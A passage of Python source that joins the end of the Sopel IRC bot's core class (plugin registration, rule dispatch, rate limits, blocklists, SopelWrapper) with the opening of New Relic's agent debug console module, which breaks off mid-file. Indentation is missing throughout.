for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info("Unloaded plugin %s", name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
meta = plugin.get_meta_description()
LOGGER.info("Reloaded %s plugin %s from %s",
meta['type'], name, meta['source'])
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry.
:param plugin: loaded plugin to add
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
self._plugins[plugin.name] = plugin
self.register_callables(callables)
self.register_jobs(jobs)
self.register_shutdowns(shutdowns)
self.register_urls(urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry.
:param plugin: loaded plugin to remove
:type plugin: :class:`sopel.plugins.handlers.AbstractPluginHandler`
:param callables: an iterable of callables from the ``plugin``
:type callables: :term:`iterable`
:param jobs: an iterable of functions from the ``plugin`` that are
periodically invoked
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions from the ``plugin`` that
should be called on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions from the ``plugin`` to call when
matched against a URL
:type urls: :term:`iterable`
"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove plugin rules, jobs, shutdown functions, and url callbacks
self._rules_manager.unregister_plugin(name)
self._scheduler.unregister_plugin(name)
self.unregister_shutdowns(shutdowns)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Check if the bot has registered a plugin of the specified name.
:param str name: name of the plugin to check for
:return: whether the bot has a plugin named ``name`` registered
:rtype: bool
"""
return name in self._plugins
def get_plugin_meta(self, name):
"""Get info about a registered plugin by its name.
:param str name: name of the plugin about which to get info
:return: the plugin's metadata
(see :meth:`~.plugins.handlers.AbstractPluginHandler.get_meta_description`)
:rtype: :class:`dict`
:raise plugins.exceptions.PluginNotRegistered: when there is no
``name`` plugin registered
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
return self._plugins[name].get_meta_description()
# callable management
def register_callables(self, callables):
match_any = re.compile(r'.*')
settings = self.settings
for callbl in callables:
rules = getattr(callbl, 'rule', [])
lazy_rules = getattr(callbl, 'rule_lazy_loaders', [])
find_rules = getattr(callbl, 'find_rules', [])
lazy_find_rules = getattr(callbl, 'find_rules_lazy_loaders', [])
search_rules = getattr(callbl, 'search_rules', [])
lazy_search_rules = getattr(callbl, 'search_rules_lazy_loaders', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
is_rule = any([
rules,
lazy_rules,
find_rules,
lazy_find_rules,
search_rules,
lazy_search_rules,
])
is_command = any([commands, nick_commands, action_commands])
if rules:
rule = plugin_rules.Rule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_rules:
try:
rule = plugin_rules.Rule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register rule: %s', err)
if find_rules:
rule = plugin_rules.FindRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_find_rules:
try:
rule = plugin_rules.FindRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register find rule: %s', err)
if search_rules:
rule = plugin_rules.SearchRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_search_rules:
try:
rule = plugin_rules.SearchRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register search rule: %s', err)
if commands:
rule = plugin_rules.Command.from_callable(settings, callbl)
self._rules_manager.register_command(rule)
if nick_commands:
rule = plugin_rules.NickCommand.from_callable(
settings, callbl)
self._rules_manager.register_nick_command(rule)
if action_commands:
rule = plugin_rules.ActionCommand.from_callable(
settings, callbl)
self._rules_manager.register_action_command(rule)
if not is_command and not is_rule:
callbl.rule = [match_any]
self._rules_manager.register(
plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
for func in jobs:
job = sopel.tools.jobs.Job.from_callable(self.settings, func)
self._scheduler.register(job)
def unregister_jobs(self, jobs):
for job in jobs:
self._scheduler.remove_callable_job(job)
def register_shutdowns(self, shutdowns):
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods = self.shutdown_methods + list(shutdowns)
def unregister_shutdowns(self, shutdowns):
self.shutdown_methods = [
shutdown
for shutdown in self.shutdown_methods
if shutdown not in shutdowns
]
def register_urls(self, urls):
for func in urls:
url_regex = getattr(func, 'url_regex', [])
url_lazy_loaders = getattr(func, 'url_lazy_loaders', None)
if url_regex:
rule = plugin_rules.URLCallback.from_callable(
self.settings, func)
self._rules_manager.register_url_callback(rule)
if url_lazy_loaders:
try:
rule = plugin_rules.URLCallback.from_callable_lazy(
self.settings, func)
self._rules_manager.register_url_callback(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error("Cannot register URL callback: %s", err)
# message dispatch
def call_rule(self, rule, sopel, trigger):
# rate limiting
if not trigger.admin and not rule.is_unblockable():
if rule.is_rate_limited(trigger.nick):
return
if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
return
if rule.is_global_rate_limited():
return
# channel config
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
if '*' in disabled_plugins:
return
elif rule.get_plugin_name() in disabled_plugins:
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
if rule.get_rule_label() in disabled_commands:
return
try:
rule.execute(sopel, trigger)
except KeyboardInterrupt:
raise
except Exception as error:
self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching rules;
it will retrieve them by order of priority, and execute them. It runs
triggered rules in separate threads, unless they are marked otherwise.
However, it won't run triggered blockable rules at all when they can't
be executed for blocked nickname or hostname.
.. seealso::
The pattern matching is done by the
:class:`Rules Manager<sopel.plugins.rules.Manager>`.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_rules = set()
# account info
nick = pretrigger.nick
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
# skip processing replayed messages
if "time" in pretrigger.tags and pretrigger.sender in self.channels:
join_time = self.channels[pretrigger.sender].join_time
if join_time is not None and pretrigger.time < join_time:
return
for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
trigger = Trigger(self.settings, pretrigger, match, account)
is_unblockable = trigger.admin or rule.is_unblockable()
if blocked and not is_unblockable:
list_of_blocked_rules.add(str(rule))
continue
wrapper = SopelWrapper(
self, trigger, output_prefix=rule.get_output_prefix())
if rule.is_threaded():
# run in a separate thread
targs = (rule, wrapper, trigger)
t = threading.Thread(target=self.call_rule, args=targs)
plugin_name = rule.get_plugin_name()
rule_label = rule.get_rule_label()
t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
t.start()
running_triggers.append(t)
else:
# direct call
self.call_rule(rule, wrapper, trigger)
# update currently running triggers
self._update_running_triggers(running_triggers)
if list_of_blocked_rules:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_rules),
block_type,
)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the job scheduler that errored
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the job scheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
LOGGER.info("Shutting down")
# Stop Job Scheduler
LOGGER.info("Stopping the Job Scheduler.")
self._scheduler.stop()
try:
self._scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception("Unable to stop the Job Scheduler.")
else:
LOGGER.info("Job Scheduler stopped.")
self._scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
"Calling shutdown for %d plugins.", len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
"Calling %s.%s",
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception("Error calling shutdown method: %s", e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
# URL callbacks management
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Stores registered callbacks in an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
self._url_callbacks[pattern] = callback
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Deletes registered callbacks from an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
try:
del self._url_callbacks[pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. versionchanged:: 8.0
Searches for registered callbacks in an internal property instead
of ``bot.memory['url_callbacks']``.
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in self._url_callbacks.items():
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper:
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``message`` into at most this many
messages if it is too long to fit into one
line (optional)
:param str truncation: string to indicate that the ``message`` was
truncated (optional)
:param str trailing: string that should always appear at the end of
``message`` (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
For more details about the optional arguments to this wrapper
method, consult the documentation for :meth:`sopel.bot.Sopel.say`.
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages, truncation, trailing)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
console.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import atexit
import cmd
import code
import functools
import glob
import inspect
import optparse
import os
import shlex
import socket
import sys
import threading
import traceback
import os
import time
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
try:
import __builtin__
except ImportError:
import builtins as __builtin__
def _argspec_py2(func):
return inspect.getargspec(func)
def _argspec_py3(func):
a = inspect.getfullargspec(func)
return (a.args, a.varargs, a.varkw, a.defaults)
if hasattr(inspect, 'getfullargspec'):
_argspec = _argspec_py3
else:
_argspec = _argspec_py2
from newrelic.core.agent import agent_instance
from newrelic.core.config import global_settings, flatten_settings
from newrelic.api.transaction import Transaction
from newrelic.api.object_wrapper import ObjectWrapper
from newrelic.core.trace_cache import trace_cache
_trace_cache = trace_cache()
def shell_command(wrapped):
args, varargs, keywords, defaults = _argspec(wrapped)
parser = optparse.OptionParser()
for name in args[1:]:
parser.add_option('--%s' % name, dest=name)
@functools.wraps(wrapped)
def wrapper(self, line):
result = shlex.split(line)
(options, args) = parser.parse_args(result)
kwargs = {}
for key, value in options.__dict__.items():
if value is not None:
kwargs[key] = value
return wrapped(self, *args, **kwargs)
if wrapper.__name__.startswith('do_'):
prototype = wrapper.__name__[3:] + ' ' + inspect.formatargspec(
args[1:], varargs, keywords, defaults)
if hasattr(wrapper, '__doc__') and wrapper.__doc__ is not None:
wrapper.__doc__ = '\n'.join((prototype,
wrapper.__doc__.lstrip('\n')))
return wrapper
_consoles = threading.local()
def acquire_console(shell):
_consoles.active = shell
def release_console():
del _consoles.active
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ':':
eof = 'Cmd-Q'
elif os.sep == '\\':
eof = 'Ctrl-Z plus Return'
else:
eof = 'Ctrl-D (i.e. EOF)'
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Use %s() or %s to exit' % (self.name, eof)
def __call__(self, code=None):
# If executed with our interactive console, only raise the
# SystemExit exception but don't close sys.stdout as we are
# not the owner of it.
if hasattr(_consoles, 'active'):
raise SystemExit(code)
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except Exception:
pass
raise SystemExit(code)
__builtin__.quit = Quitter('quit')
__builtin__.exit = Quitter('exit')
class OutputWrapper(ObjectWrapper):
def flush(self):
try:
shell = _consoles.active
return shell.stdout.flush()
except Exception:
return self._nr_next_object.flush()
def write(self, data):
try:
shell = _consoles.active
return shell.stdout.write(data)
except Exception:
return self._nr_next_object.write(data)
def writelines(self, data):
try:
shell = _consoles.active
return shell.stdout.writelines(data)
except Exception:
return self._nr_next_object.writelines(data)
def intercept_console():
setquit()
sys.stdout = OutputWrapper(sys.stdout, None, None)
sys.stderr = OutputWrapper(sys.stderr, None, None)
class EmbeddedConsole(code.InteractiveConsole):
def write(self, data):
self.stdout.write(data)
self.stdout.flush()
def raw_input(self, prompt):
self.stdout.write(prompt)
self.stdout.flush()
line = self.stdin.readline()
line = line.rstrip('\r\n')
return line
class ConsoleShell(cmd.Cmd):
use_rawinput = 0
def __init__(self):
cmd.Cmd.__init__(self)
self.do_prompt('on')
def emptyline(self):
pass
def help_help(self):
print("""help (command)
Output list of commands or help details for named command.""",
file=self.stdout)
@shell_command
def do_prompt(self, flag=None):
"""
Enable or disable the console prompt."""
if flag == 'on':
self.prompt = '(newrelic:%d) ' % os.getpid()
elif flag == 'off':
self.prompt = ''
@shell_command
def do_exit(self):
"""
Exit the console."""
return True
@shell_command
def do_process_id(self):
"""
Displays the process ID of the process."""
print(os.getpid(), file=self.stdout)
@shell_command
def do_sys_prefix(self):
"""
Displays the value of sys.prefix."""
print(sys.prefix, file=self.stdout)
@shell_command
def do_sys_path(self):
"""
Displays the value of sys.path."""
print(sys.path, file=self.stdout)
@shell_command
def do_sys_modules(self):
"""
Displays the list of Python modules loaded."""
for name, module in sorted(sys.modules.items()):
if module is not None:
file = getattr(module, '__file__', None)
print("%s - %s" % (name, file), file=self.stdout)
@shell_command
def do_sys_meta_path(self):
"""
Displays the value of sys.meta_path."""
print(sys.meta_path, file=self.stdout)
@shell_command
def do_os_environ(self):
"""
Displays the set of user environment variables."""
for key, name in os.environ.items():
print("%s = %r" % (key, name), file=self.stdout)
@shell_command
def do_current_time(self):
"""
Displays the current time."""
print(time.asctime(), file=self.stdout)
@shell_command
def do_config_args(self):
"""
Displays the configure arguments used to build Python."""
args = ''
try:
# This may fail if using package Python and the
# developer package for Python isn't also installed.
import distutils.sysconfig
args = distutils.sysconfig.get_config_var('CONFIG_ARGS')
except Exception:
pass
print(args, file=self.stdout)
@shell_command
def do_dump_config(self, name=None):
"""
Displays global configuration or that of the named application.
"""
if name is None:
config = agent_instance().global_settings()
else:
config = agent_instance().application_settings(name)
if config is not None:
config = flatten_settings(config)
keys = sorted(config.keys())
for key in keys:
print('%s = %r' % (key, config[key]), file=self.stdout)
@shell_command
def do_agent_status(self):
"""
Displays general status information about the agent, registered
applications, harvest cycles etc.
"""
agent_instance().dump(self.stdout)
@shell_command
def do_applications(self):
"""
Displays a list of the applications.
"""
print(repr(sorted(
agent_instance().applications.keys())), file=self.stdout)
@shell_command
def do_application_status(self, name=None):
"""
Displays general status information about an application, last
harvest cycle, etc.
"""
if name is not None:
applications = [agent_instance().application(name)]
else:
applications = agent_instance().applications.values()
for application in applications:
if application is not None:
application.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_import_hooks(self):
"""
Displays list of registered import hooks, which have fired and
which encountered errors.
"""
from newrelic.config import module_import_hook_results
results = module_import_hook_results()
for key in sorted(results.keys()):
result = results[key]
if result is None:
if key[0] not in sys.modules:
print('%s: PENDING' % (key,), file=self.stdout)
else:
print('%s: IMPORTED' % (key,), file=self.stdout)
elif not result:
print('%s: INSTRUMENTED' % (key,), file=self.stdout)
else:
print('%s: FAILED' % (key,), file=self.stdout)
for line in result:
print(line, end='', file=self.stdout)
@shell_command
def do_transactions(self):
"""
"""
for item in _trace_cache.active_threads():
transaction, thread_id, thread_type, frame = item
print('THREAD', item, file=self.stdout)
if transaction is not None:
transaction.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_interpreter(self):
"""
When enabled in the configuration file, will startup up an embedded
interactive Python interpreter. Invoke 'exit()' or 'quit()' to
escape the interpreter session."""
enabled = False
_settings = global_settings()
if not _settings.console.allow_interpreter_cmd:
print('Sorry, the embedded Python ' \
'interpreter is disabled.', file=self.stdout)
return
locals = {}
locals['stdin'] = self.stdin
locals['stdout'] = self.stdout
console = EmbeddedConsole(locals)
console.stdin = self.stdin
console.stdout = self.stdout
acquire_console(self)
try:
console.interact()
except SystemExit:
pass
finally:
release_console()
@shell_command
def do_threads(self):
"""
Display stack trace dumps for all threads currently executing
within the Python interpreter.
Note that if coroutines are being used, such as systems based
on greenlets, then only the thread stack of the currently
executing coroutine will be displayed."""
all = []
for threadId, stack in sys._current_frames().items():
block = []
block.append('# ThreadID: %s' % threadId)
thr = threading._active.get(threadId)
if thr:
block.append('# Type: %s' % type(thr).__name__)
block.append('# Name: %s' % thr.name)
for filename, lineno, name, line in traceback.extract_stack(
stack):
block.append('File: \'%s\', line %d, in %s' % (filename,
lineno, name))
if line:
block.append(' %s' % (line.strip()))
all.append('\n'.join(block))
print('\n\n'.join(all), file=self.stdout)
class ConnectionManager(object):
def __init__(self, listener_socket):
self.__listener_socket = listener_socket
self.__console_initialized = False
if not os.path.isabs(self.__listener_socket):
host, port = self.__listener_socket.split(':')
port = int(port)
self.__listener_socket = (host, port)
self.__thread = threading.Thread(target=self.__thread_run,
name='NR-Console-Manager')
self.__thread.setDaemon(True)
self.__thread.start()
def __socket_cleanup(self, path):
try:
os.unlink(path)
except Exception:
pass
def __thread_run(self):
if type(self.__listener_socket) == type(()):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(self.__listener_socket)
else:
try:
os.unlink(self.__listener_socket)
except Exception:
pass
listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
